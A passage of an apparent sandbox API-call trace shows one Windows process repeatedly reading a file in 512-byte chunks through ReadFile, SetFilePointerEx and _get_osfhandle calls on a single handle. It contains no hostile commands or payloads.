lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.248] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.248] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.248] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.295] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.296] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.296] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.296] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.297] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.297] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.297] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.298] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.298] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.298] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.299] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.299] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.299] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.300] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.300] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.300] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.301] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.301] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.301] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.302] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.302] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.302] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: 